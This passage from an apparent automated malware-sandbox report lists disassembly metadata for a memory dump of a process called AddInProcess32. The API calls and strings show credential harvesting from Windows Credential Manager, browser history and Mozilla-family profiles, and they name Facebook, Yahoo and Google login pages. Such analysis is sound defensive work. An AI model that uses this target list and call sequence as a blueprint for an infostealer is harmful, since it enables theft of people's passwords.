                                                      • memset.MSVCRT ref: 0040BC75
                                                      • memset.MSVCRT ref: 0040BC8C
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                      • String ID:
                                                      • API String ID: 115830560-3916222277
                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                      • free.MSVCRT ref: 0041848B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CreateFile$ErrorLastfree
                                                      • String ID: |A
                                                      • API String ID: 77810686-1717621600
                                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0041249C
                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                      • wcscpy.MSVCRT ref: 004125A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                      • String ID: r!A
                                                      • API String ID: 2791114272-628097481
                                                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                      APIs
                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                      • wcslen.MSVCRT ref: 0040C82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                      • API String ID: 2936932814-4196376884
                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                      • String ID: BIN
                                                      • API String ID: 1668488027-1015027815
                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                      APIs
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                      • wcslen.MSVCRT ref: 0040BE06
                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                      • memset.MSVCRT ref: 0040BE91
                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                      • wcschr.MSVCRT ref: 0040BF24
                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                      • String ID:
                                                      • API String ID: 697348961-0
                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                      APIs
                                                      • memset.MSVCRT ref: 00403CBF
                                                      • memset.MSVCRT ref: 00403CD4
                                                      • memset.MSVCRT ref: 00403CE9
                                                      • memset.MSVCRT ref: 00403CFE
                                                      • memset.MSVCRT ref: 00403D13
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 00403DDA
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                      • String ID: Waterfox$Waterfox\Profiles
                                                      • API String ID: 3527940856-11920434
                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                      APIs
                                                      • memset.MSVCRT ref: 00403E50
                                                      • memset.MSVCRT ref: 00403E65
                                                      • memset.MSVCRT ref: 00403E7A
                                                      • memset.MSVCRT ref: 00403E8F
                                                      • memset.MSVCRT ref: 00403EA4
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 00403F6B
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                      • API String ID: 3527940856-2068335096
                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                      APIs
                                                      • memset.MSVCRT ref: 00403FE1
                                                      • memset.MSVCRT ref: 00403FF6
                                                      • memset.MSVCRT ref: 0040400B
                                                      • memset.MSVCRT ref: 00404020
                                                      • memset.MSVCRT ref: 00404035
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 004040FC
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                      • API String ID: 3527940856-3369679110
                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                      APIs
                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                      • API String ID: 3510742995-2641926074
                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                      APIs
                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                      • memset.MSVCRT ref: 004033B7
                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                      • wcscmp.MSVCRT ref: 004033FC
                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                      • String ID: $0.@
                                                      • API String ID: 2758756878-1896041820
                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 2941347001-0
                                                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                      APIs
                                                      • memset.MSVCRT ref: 00403C09
                                                      • memset.MSVCRT ref: 00403C1E
                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                      • wcscat.MSVCRT ref: 00403C47
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                      • wcscat.MSVCRT ref: 00403C70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memsetwcscat$Closewcscpywcslen
                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                      • API String ID: 3249829328-1174173950
                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                      APIs
                                                      • memset.MSVCRT ref: 0040A824
                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • wcscpy.MSVCRT ref: 0040A854
                                                      • wcscat.MSVCRT ref: 0040A86A
                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 669240632-0
                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                      APIs
                                                      • wcschr.MSVCRT ref: 00414458
                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                      • String ID: "%s"
                                                      • API String ID: 1343145685-3297466227
                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                      • String ID: GetProcessTimes$kernel32.dll
                                                      • API String ID: 1714573020-3385500049
                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                      APIs
                                                      • memset.MSVCRT ref: 004087D6
                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                      • memset.MSVCRT ref: 00408828
                                                      • memset.MSVCRT ref: 00408840
                                                      • memset.MSVCRT ref: 00408858
                                                      • memset.MSVCRT ref: 00408870
                                                      • memset.MSVCRT ref: 00408888
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      Memory Dump Source
